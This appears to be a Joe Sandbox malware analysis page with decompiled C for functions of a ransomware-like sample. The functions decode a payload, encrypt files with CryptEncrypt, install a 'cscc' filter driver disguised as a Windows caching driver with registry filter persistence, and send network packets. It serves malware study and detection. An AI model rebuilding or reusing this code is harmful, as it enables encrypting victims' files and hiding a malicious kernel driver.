Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CryptHash$FileView$Local$AllocDataDestroyDuplicateFlushFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@memcpy
String ID: L^{$encrypted
API String ID: 3326259677-3620586752
Opcode ID: 4f18f01f9efdd4d3352e70d88adb91e1aef3ab5df5297476e05813f319440778
Instruction ID: d74a0c6c3954445b35621174624eac688503a53738d58728d7f9e5e6edbf2143
Opcode Fuzzy Hash: 4f18f01f9efdd4d3352e70d88adb91e1aef3ab5df5297476e05813f319440778
Instruction Fuzzy Hash: B04118B1A00209BFDB11DF68DD48FEE7BBAFB44340F058124F905A6250EB759E148BA0

Uniqueness

Uniqueness Score: -1.00%

Function 007B8313 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 99
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E007B8313(signed int __eax, void _a4, void* _a8) {
				int _v8;
				signed int _v12;
				void* _v16;
				void* _t21;
				void* _t22;
				long _t23;
				void* _t25;
				int _t27;
				void* _t29;
				void* _t32;
				void* _t35;
				void** _t39;
				long _t46;
				void* _t48;
				struct HRSRC__* _t50;

				_v12 = _v12 & 0x00000000;
				_t50 = FindResourceW( *0x7c7b98, __eax & 0x0000ffff, 6);
				if(_t50 == 0) {
					L17:
					return _v12;
				}
				_t21 = LoadResource( *0x7c7b98, _t50);
				if(_t21 == 0) {
					goto L17;
				}
				_t22 = LockResource(_t21);
				_v16 = _t22;
				if(_t22 == 0) {
					goto L17;
				}
				_t23 = SizeofResource( *0x7c7b98, _t50);
				_v8 = _t23;
				if(_t23 == 0) {
					goto L17;
				}
				_t25 = RtlAllocateHeap(GetProcessHeap(), 0, _t23); // executed
				_t48 = _t25;
				if(_t48 == 0) {
					L16:
					goto L17;
				}
				memcpy(_t48, _v16, _v8);
				_t27 = _v8;
				if(_t27 == 0) {
					L9:
					_t29 = RtlAllocateHeap(GetProcessHeap(), 8,  *_t48); // executed
					_t39 = _a4;
					 *_t39 = _t29;
					if(_t29 != 0) {
						_a4 =  *_t48;
						_t11 = _t48 + 4; // 0x4
						_t32 = E007BA790(_t29,  &_a4, _t11, _v8 + 0xfffffffc); // executed
						if(_t32 != 0) {
							HeapFree(GetProcessHeap(), 0,  *_t39);
						} else {
							_t35 = _a8;
							if(_t35 != 0) {
								 *_t35 = _a4;
							}
							_v12 = 1;
						}
					}
					RtlFreeHeap(GetProcessHeap(), 0, _t48); // executed
					goto L16;
				}
				_t46 =  *_t48;
				do {
					_t46 = _t46 ^ 0x000000e9;
					_t27 = _t27 - 1;
				} while (_t27 != 0);
				 *_t48 = _t46;
				goto L9;
			}

0x007b8319
0x007b8330
0x007b8334
0x007b8415
0x007b841a
0x007b841a
0x007b8341
0x007b8349
0x00000000
0x00000000
0x007b8350
0x007b8356
0x007b835b
0x00000000
0x00000000
0x007b8368
0x007b836e
0x007b8373
0x00000000
0x00000000
0x007b838d
0x007b838f
0x007b8393
0x007b8413
0x00000000
0x007b8414
0x007b839c
0x007b83a1
0x007b83a9
0x007b83b5
0x007b83bc
0x007b83be
0x007b83c1
0x007b83c5
0x007b83c9
0x007b83d3
0x007b83dc
0x007b83e3
0x007b8401
0x007b83e5
0x007b83e5
0x007b83ea
0x007b83ef
0x007b83ef
0x007b83f1
0x007b83f1
0x007b83e3
0x007b840d
0x00000000
0x007b840d
0x007b83ab
0x007b83ad
0x007b83ad
0x007b83b0
0x007b83b0
0x007b83b3
0x00000000

APIs

FindResourceW.KERNEL32(?,00000006,00000000,?), ref: 007B832A
LoadResource.KERNEL32(00000000), ref: 007B8341
LockResource.KERNEL32(00000000), ref: 007B8350
SizeofResource.KERNEL32(00000000), ref: 007B8368
GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 007B8384
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007B838D
memcpy.MSVCRT ref: 007B839C
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 007B83B9
RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B83BC
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 007B83FE
HeapFree.KERNEL32(00000000,?,?,?,00000002), ref: 007B8401
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 007B840A
RtlFreeHeap.NTDLL(00000000,?,?,?,00000002), ref: 007B840D

Strings

Uet0Xet, xrefs: 007B8401, 007B840D

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$ProcessResource$AllocateFree$FindLoadLockSizeofmemcpy
String ID: Uet0Xet
API String ID: 3010137425-1689521831
Opcode ID: 130189d95e511908d4b7f774bff9cc855829c0a42928c07b8486028841a7cc81
Instruction ID: db886541ff6854286e83f25cb361f72f5317bb27e0a662045a994212f8435f1f
Opcode Fuzzy Hash: 130189d95e511908d4b7f774bff9cc855829c0a42928c07b8486028841a7cc81
Instruction Fuzzy Hash: CC31387190024AABCB219FA9DC48FEE7FACEF44354F108124F91597290EF38C910CB65

Uniqueness

Uniqueness Score: -1.00%

Function 007B5A73 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 132
fileencryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E007B5A73(void* __eflags, void* _a4, intOrPtr _a8, long _a16, signed int* _a20, char _a24) {
				long _v8;
				void* _v12;
				struct _SYSTEM_INFO _v48;
				void* _t45;
				long _t47;
				void* _t48;
				signed int _t51;
				void** _t53;
				long _t54;
				long* _t56;
				void* _t62;
				void* _t63;
				signed int _t64;
				long _t78;
				intOrPtr _t82;
				void* _t88;
				void* _t98;
				long* _t103;

				_t64 = 8;
				_v48.dwOemId = 0;
				memset( &(_v48.dwPageSize), 0, _t64 << 2);
				_v8 = 0;
				GetSystemInfo( &_v48); // executed
				_t88 =  *(_a16 + 0x44) + 0x16;
				_t82 = _a8 - _t88;
				asm("sbb [ebp+0x10], ebx");
				_t61 = _v48.dwAllocationGranularity;
				asm("adc edx, [ebp+0x10]");
				asm("sbb edx, eax");
				_a8 = _t82;
				_t45 = E007BA6B0(_v48.dwAllocationGranularity + _t82 - 1, 0, _v48.dwAllocationGranularity, 0);
				asm("sbb edx, 0x0");
				_t47 = E007BA670(_t45 - 1, 0, _t61, 0);
				_t62 = _t82 - _t47;
				_t48 = MapViewOfFile(_a4, 4, 0, _t47, _t62 + _t88); // executed
				_v12 = _t48;
				_t98 = _t48;
				if(_t98 != 0) {
					_t78 = _a16;
					_push(9);
					asm("repe cmpsw");
					_t51 = 0 | _t98 == 0x00000000;
					 *_a20 = _t51;
					if(_t51 == 0) {
						_v8 = 1;
					} else {
						_t53 =  &_a4;
						_a4 = 0;
						__imp__CryptDuplicateHash( *((intOrPtr*)(_t78 + 0x40)), 0, 0, _t53);
						if(_t53 != 0) {
							__imp__CryptHashData(_a4, _v12 + _t62, 4, 0);
							if(_t53 != 0) {
								_t54 =  *(_a16 + 0x44);
								_a16 = _t54;
								_t63 = LocalAlloc(0x40, _t54);
								if(_t63 != 0) {
									_t56 =  &_a16;
									__imp__CryptGetHashParam(_a4, 2, _t63, _t56, 0);
									_v8 = _t56;
									_t103 = _t56;
									if(_t103 != 0) {
										asm("repe cmpsb");
										_t33 =  &_a24; // 0x7b5de8
										 *( *_t33) = 0 | _t103 == 0x00000000;
									}
									LocalFree(_t63);
								}
							}
							__imp__CryptDestroyHash(_a4);
						}
					}
					UnmapViewOfFile(_v12);
				}
				return _v8;
			}

0x007b5a80
0x007b5a83
0x007b5a89
0x007b5a8f
0x007b5a92
0x007b5aa1
0x007b5aa4
0x007b5aa6
0x007b5aa9
0x007b5ab4
0x007b5abc
0x007b5ac0
0x007b5ac3
0x007b5acd
0x007b5ad6
0x007b5add
0x007b5aea
0x007b5af0
0x007b5af3
0x007b5af5
0x007b5afb
0x007b5b05
0x007b5b11
0x007b5b17
0x007b5b1a
0x007b5b20
0x007b5baa
0x007b5b26
0x007b5b26
0x007b5b2f
0x007b5b32
0x007b5b3a
0x007b5b49
0x007b5b51
0x007b5b56
0x007b5b5c
0x007b5b65
0x007b5b69
0x007b5b6d
0x007b5b77
0x007b5b7d
0x007b5b80
0x007b5b82
0x007b5b8e
0x007b5b90
0x007b5b96
0x007b5b96
0x007b5b99
0x007b5b99
0x007b5b69
0x007b5ba2
0x007b5ba2
0x007b5b3a
0x007b5bb4
0x007b5bb4
0x007b5bc1

APIs

GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,007B5DE8,00000000,?,?,?,00000010,?), ref: 007B5A92
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B5AC3
MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5AEA
CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B32
CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B49
LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B5F
CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B77
LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5B99
CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5BA2
UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 007B5BB4

Strings

]{, xrefs: 007B5B90
encrypted, xrefs: 007B5B08

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: encrypted$]{
API String ID: 569730286-3574831567
Opcode ID: cefcb4c360266fafb1fc9dc82a1056085de3850f0672dbd24ec3cb5090cc0346
Instruction ID: 55dc93924d61dda8edc9997ce53c16108d72aa2e099073191d5d81f40fb43c66
Opcode Fuzzy Hash: cefcb4c360266fafb1fc9dc82a1056085de3850f0672dbd24ec3cb5090cc0346
Instruction Fuzzy Hash: 95414FB2600209AFDB149F78DC44FAA3BA9EB44354F058128FD05E7250EB75ED05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B2054 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 110
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007B2054(intOrPtr _a4, void* _a8, short* _a12, intOrPtr* _a16, intOrPtr _a20) {
				char _v5;
				long _v12;
				void* _v16;
				void* _t38;
				intOrPtr* _t40;
				long _t42;
				void* _t49;
				intOrPtr* _t50;
				short _t51;
				void* _t54;
				void* _t59;
				void* _t61;
				signed int _t62;
				intOrPtr _t64;
				char _t66;
				intOrPtr _t68;
				void* _t76;
				intOrPtr* _t77;
				void* _t78;

				_v5 = 0;
				_t38 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v16 = _t38;
				if(_t38 == 0) {
					L14:
					return _v5;
				}
				_t40 = _a16;
				_t61 = _t40 + 1;
				do {
					_t68 =  *_t40;
					_t40 = _t40 + 1;
				} while (_t68 != 0);
				_t42 = _t40 - _t61 + 0x58;
				_v12 = _t42;
				_t59 = HeapAlloc(GetProcessHeap(), 8, _t42);
				if(_t59 == 0) {
					L13:
					HeapFree(GetProcessHeap(), 8, _v16);
					goto L14;
				}
				_t62 = 9;
				_t49 = memcpy(_t59, _a8, _t62 << 2);
				__imp__#9(_v12 + 0xfffffffc);
				 *(_t59 + 2) = _t49;
				_t50 = _a16;
				 *((char*)(_t59 + 8)) = 0xa2;
				 *((short*)(_t59 + 0x24)) = 0xff18;
				_t76 = _t50 + 1;
				do {
					_t64 =  *_t50;
					_t50 = _t50 + 1;
				} while (_t64 != 0);
				_t51 = _t50 - _t76;
				_t77 = _a16;
				 *((short*)(_t59 + 0x2a)) = _t51;
				 *((short*)(_t59 + 0x55)) = _t51 + 1;
				_t18 = _t59 + 0x57; // 0x57
				 *((intOrPtr*)(_t59 + 0x2c)) = 0x16;
				 *((intOrPtr*)(_t59 + 0x34)) = 0x2019f;
				 *((intOrPtr*)(_t59 + 0x44)) = 3;
				 *((intOrPtr*)(_t59 + 0x48)) = _a20;
				 *((intOrPtr*)(_t59 + 0x4c)) = 0x40;
				 *((intOrPtr*)(_t59 + 0x50)) = 2;
				 *((char*)(_t59 + 0x54)) = 3;
				_t54 = _t18 - _t77;
				do {
					_t66 =  *_t77;
					 *((char*)(_t54 + _t77)) = _t66;
					_t77 = _t77 + 1;
				} while (_t66 != 0);
				__imp__#19(_a4, _t59, _v12, 0); // executed
				if(_t54 > 0) {
					_t78 = _v16;
					__imp__#16(_a4, _t78, 0xffff, 0); // executed
					if(_t54 > 0 &&  *((intOrPtr*)(_t78 + 9)) == 0) {
						 *_a12 =  *((intOrPtr*)(_t78 + 0x2a));
						_v5 = 1;
					}
				}
				HeapFree(GetProcessHeap(), 8, _t59);
				goto L13;
			}

0x007b2069
0x007b2076
0x007b2078
0x007b207d
0x007b2188
0x007b218e
0x007b218e
0x007b2083
0x007b2086
0x007b2089
0x007b2089
0x007b208b
0x007b208c
0x007b2093
0x007b2099
0x007b20a1
0x007b20a5
0x007b2175
0x007b2181
0x00000000
0x007b2187
0x007b20b3
0x007b20ba
0x007b20bc
0x007b20c2
0x007b20c6
0x007b20c9
0x007b20cd
0x007b20d3
0x007b20d6
0x007b20d6
0x007b20d8
0x007b20d9
0x007b20e0
0x007b20e2
0x007b20e5
0x007b20ea
0x007b20ee
0x007b20f1
0x007b20f8
0x007b20ff
0x007b2106
0x007b2109
0x007b2110
0x007b2117
0x007b211b
0x007b211d
0x007b211d
0x007b211f
0x007b2122
0x007b2123
0x007b2131
0x007b2139
0x007b213b
0x007b2148
0x007b2150
0x007b215e
0x007b2161
0x007b2161
0x007b2150
0x007b216f
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,007B943A), ref: 007B206D
HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2076
GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,007B943A), ref: 007B209C
HeapAlloc.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B209F
htons.WS2_32(?), ref: 007B20BC
send.WS2_32(?,00000000,?,00000000), ref: 007B2131
recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B2148
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,007B943A), ref: 007B2168
HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B216F
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,007B943A), ref: 007B217A
HeapFree.KERNEL32(00000000,?,?,?,?,007B943A), ref: 007B2181

Strings

Oet Uet0Xet, xrefs: 007B205C, 007B2168, 007B217A

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFree$htonsrecvsend
String ID: Oet Uet0Xet
API String ID: 1780562090-3175316637
Opcode ID: 51e3eb2eff202ac346f14a69bfd930b54fd9dad9e31ea5579f2401b074a953b8
Instruction ID: 4f7261e6fd415a0a9ae122164a13cfc8a9335e78586d65c05477f30022a45804
Opcode Fuzzy Hash: 51e3eb2eff202ac346f14a69bfd930b54fd9dad9e31ea5579f2401b074a953b8
Instruction Fuzzy Hash: D641B67550024AABDF119FA8DC49B9A7FB4FF49304F048198E9449B252DB79D805CB64

Uniqueness

Uniqueness Score: -1.00%

Function 007B1368 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 51
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B1368(void* __ecx) {
				void* _v8;
				void* _t5;
				void* _t13;
				void* _t17;

				_t5 = OpenSCManagerW(0, 0, 0xf003f); // executed
				_t13 = _t5;
				if(_t13 != 0) {
					_t17 = CreateServiceW(_t13, L"cscc", L"Windows Client Side Caching DDriver", 0xf01ff, 1, 0, 3, L"cscc.dat", L"Filter", 0, L"FltMgr", 0, 0);
					if(_t17 == 0) {
						_v8 = GetLastError();
					} else {
						_v8 = 0;
					}
					if(_t17 != 0) {
						CloseServiceHandle(_t17);
					}
					CloseServiceHandle(_t13);
				} else {
					_v8 = GetLastError();
				}
				return _v8;
			}

0x007b1377
0x007b137d
0x007b1381
0x007b13bc
0x007b13c0
0x007b13cd
0x007b13c2
0x007b13c2
0x007b13c2
0x007b13d8
0x007b13db
0x007b13db
0x007b13de
0x007b1383
0x007b1389
0x007b1389
0x007b13e7

APIs

OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,cscc,?,007B154F,00000000,007B11D0,?,?,?), ref: 007B1377
GetLastError.KERNEL32(?,007B154F,00000000,007B11D0,?,?,?), ref: 007B1383
CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,007B154F), ref: 007B13B6
CloseServiceHandle.ADVAPI32(00000000,?,?,007B154F,00000000,007B11D0,?,?,?), ref: 007B13DB
CloseServiceHandle.ADVAPI32(00000000,?,?,007B154F,00000000,007B11D0,?,?,?), ref: 007B13DE

Strings

cscc, xrefs: 007B136B, 007B13B0
Windows Client Side Caching DDriver, xrefs: 007B13AB
1u, xrefs: 007B13B6
FltMgr, xrefs: 007B1391
Filter, xrefs: 007B1397
cscc.dat, xrefs: 007B139C

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorLastManagerOpen
String ID: 1u$Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
API String ID: 2226085316-398523495
Opcode ID: 9e0f3c1cb7cab1eeebbeaf40d95de8b68e5192c7a4a3a58c9305e3d892f91095
Instruction ID: 5dae5becf1fea7bd8c349663412253be6e50b243ec2264330abd17f514ca2ee3
Opcode Fuzzy Hash: 9e0f3c1cb7cab1eeebbeaf40d95de8b68e5192c7a4a3a58c9305e3d892f91095
Instruction Fuzzy Hash: 8E01AD71782328FBC62167A69C8DFDFBEACDB05BA1F404019B506A3540EAF84D00C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 007B5D0A Relevance: 19.7, APIs: 13, Instructions: 152
fileencryptionCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E007B5D0A(void* __edx, long _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				long _v16;
				char _v20;
				long _v24;
				void* _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				int _t52;
				void* _t53;
				struct _SECURITY_ATTRIBUTES* _t56;
				void* _t57;
				void* _t59;
				void* _t63;
				void* _t67;
				signed int _t69;
				void* _t70;
				intOrPtr _t80;
				long _t82;
				intOrPtr _t89;

				_t80 = _a8;
				_t82 = 0;
				_t52 =  &_v16;
				_v20 = 0;
				_v32 = 0;
				_v16 = 0;
				__imp__CryptDuplicateKey( *((intOrPtr*)(_t80 + 0x3c)), 0, 0, _t52);
				if(_t52 == 0) {
					L21:
					return _t52;
				}
				_t53 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0); // executed
				_v12 = _t53;
				if(_t53 == 0xffffffff) {
					L18:
					_t52 = CryptDestroyKey(_v16);
					if(_v20 == _t82 || _v32 != _t82) {
						goto L21;
					} else {
						return SetEvent( *(_t80 + 0x48));
					}
				}
				_v24 = 0;
				__imp__GetFileSizeEx(_t53,  &_v44);
				_t73 = _v40;
				_t69 = _v44;
				_a4 = 0x1000000;
				_t89 = _v40;
				if(_t89 <= 0 && (_t89 < 0 || _t69 < 0x1000000)) {
					_v24 = 1;
					_a4 = _t69;
					_t67 = E007BA6B0(_t69, _t73, 0x10, _t82);
					asm("adc edx, esi");
					_t69 = _t67 + 1 << 4;
				}
				_t56 = 0;
				asm("adc edi, ecx");
				_t85 =  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12;
				asm("adc edi, eax");
				_t57 = CreateFileMappingW(_v12, _t56, 4, 0,  *((intOrPtr*)(_t80 + 0x44)) + _t69 + 0x12, _t56); // executed
				_v8 = _t57;
				_t92 = _t57;
				if(_t57 == 0) {
					L17:
					CloseHandle(_v12);
					_t80 = _a8;
					_t82 = 0;
					goto L18;
				}
				_v36 = _v36 & 0x00000000;
				_t59 = E007B5A73(_t92, _t57, _v44, _v40, _a8,  &_v20,  &_v32); // executed
				if(_t59 == 0 || _v20 != 0) {
					L14:
					_t70 = _v36;
					goto L15;
				} else {
					_t63 = MapViewOfFile(_v8, 6, 0, 0, _a4); // executed
					_v28 = _t63;
					if(_t63 == 0) {
						goto L14;
					}
					__imp__CryptEncrypt(_v16, 0, _v24, 0, _t63,  &_a4, _t69);
					_t70 = _t63;
					if(_t70 != 0) {
						FlushViewOfFile(_v28, _a4);
					}
					UnmapViewOfFile(_v28);
					_t97 = _t70;
					if(_t70 != 0) {
						E007B5BC4(_t97, _v8, _t85, 0, _a8); // executed
					}
					L15:
					FindCloseChangeNotification(_v8); // executed
					if(_t70 == 0) {
						asm("sbb edi, [ebp-0x24]");
						E007B5A11(_v12, _t85 - _v44, 0);
					}
					goto L17;
				}
			}

0x007b5d13
0x007b5d16
0x007b5d18
0x007b5d21
0x007b5d24
0x007b5d27
0x007b5d2a
0x007b5d32
0x007b5e9c
0x007b5e9c
0x007b5e9c
0x007b5d46
0x007b5d4c
0x007b5d52
0x007b5e7c
0x007b5e7f
0x007b5e88
0x00000000
0x007b5e8f
0x00000000
0x007b5e92
0x007b5e88
0x007b5d5d
0x007b5d60
0x007b5d66
0x007b5d69
0x007b5d71
0x007b5d74
0x007b5d76
0x007b5d83
0x007b5d8a
0x007b5d8d
0x007b5d95
0x007b5d9f
0x007b5d9f
0x007b5da7
0x007b5dad
0x007b5daf
0x007b5db3
0x007b5dbc
0x007b5dc2
0x007b5dc5
0x007b5dc7
0x007b5e6e
0x007b5e71
0x007b5e77
0x007b5e7a
0x00000000
0x007b5e7a
0x007b5dcd
0x007b5de3
0x007b5dea
0x007b5e4e
0x007b5e4e
0x00000000
0x007b5df3
0x007b5dfd
0x007b5e03
0x007b5e08
0x00000000
0x00000000
0x007b5e1a
0x007b5e20
0x007b5e24
0x007b5e2c
0x007b5e2c
0x007b5e35
0x007b5e3b
0x007b5e3d
0x007b5e47
0x007b5e47
0x007b5e51
0x007b5e54
0x007b5e5c
0x007b5e61
0x007b5e69
0x007b5e69
0x00000000
0x007b5e5c

APIs

CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 007B5D2A
CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 007B5D46
GetFileSizeEx.KERNEL32(00000000,?), ref: 007B5D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B5D8D
CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 007B5DBC
MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 007B5DFD
CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 007B5E1A
FlushViewOfFile.KERNEL32(?,?), ref: 007B5E2C
UnmapViewOfFile.KERNEL32(?), ref: 007B5E35
FindCloseChangeNotification.KERNELBASE(?,00000000,?,?,?,00000010,?), ref: 007B5E54
CloseHandle.KERNEL32(?), ref: 007B5E71
CryptDestroyKey.ADVAPI32(?), ref: 007B5E7F
SetEvent.KERNEL32(?), ref: 007B5E92

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: File$CryptView$CloseCreate$ChangeDestroyDuplicateEncryptEventFindFlushHandleMappingNotificationSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3885221687-0
Opcode ID: fd22a8d4a92035d4ddffc0c42d8f3cc37b0e40da2984d619d8914a8d5b357ee5
Instruction ID: 4a156e175cd5aad817a53043deb689b230af932bed12c1607b0c515bd0f3d24d
Opcode Fuzzy Hash: fd22a8d4a92035d4ddffc0c42d8f3cc37b0e40da2984d619d8914a8d5b357ee5
Instruction Fuzzy Hash: D5512772900219BBDF219FA5CC48FEFBF79EF08750F148125FA05A6160E7799A40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007B1531 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B1531() {
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t7;
				void* _t9;
				signed int _t11;
				void* _t13;

				_t3 = 0;
				do {
					_t11 =  *(_t3 + L"cscc") & 0x0000ffff;
					 *(_t3 + L"cscc") = _t11;
					_t3 = _t3 + 2;
				} while (_t11 != 0);
				_t4 = E007B1368(_t11); // executed
				_t13 = _t4;
				if(_t13 == 0 || E007B13E8() != 0) {
					_t5 = E007B11EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{71A27CDD-812A-11D0-BEC7-08002BE2092F}", L"LowerFilters"); // executed
					_t13 = _t5;
					if(_t13 == 0) {
						_t7 = E007B11EF(L"SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E965-E325-11CE-BFC1-08002BE10318}", L"UpperFilters"); // executed
						_t13 = _t7;
						if(_t13 == 0 && GetVersion() >= 6) {
							_t9 = E007B11EF(L"SYSTEM\\CurrentControlSet\\Control\\CrashControl", L"DumpFilters"); // executed
							_t13 = _t9;
						}
					}
				}
				return _t13;
			}

0x007b1531
0x007b1533
0x007b1533
0x007b153a
0x007b1541
0x007b1544
0x007b154a
0x007b154f
0x007b1553
0x007b1568
0x007b156d
0x007b1571
0x007b157d
0x007b1582
0x007b1586
0x007b159c
0x007b15a1
0x007b15a1
0x007b1586
0x007b1571
0x007b15a6

APIs

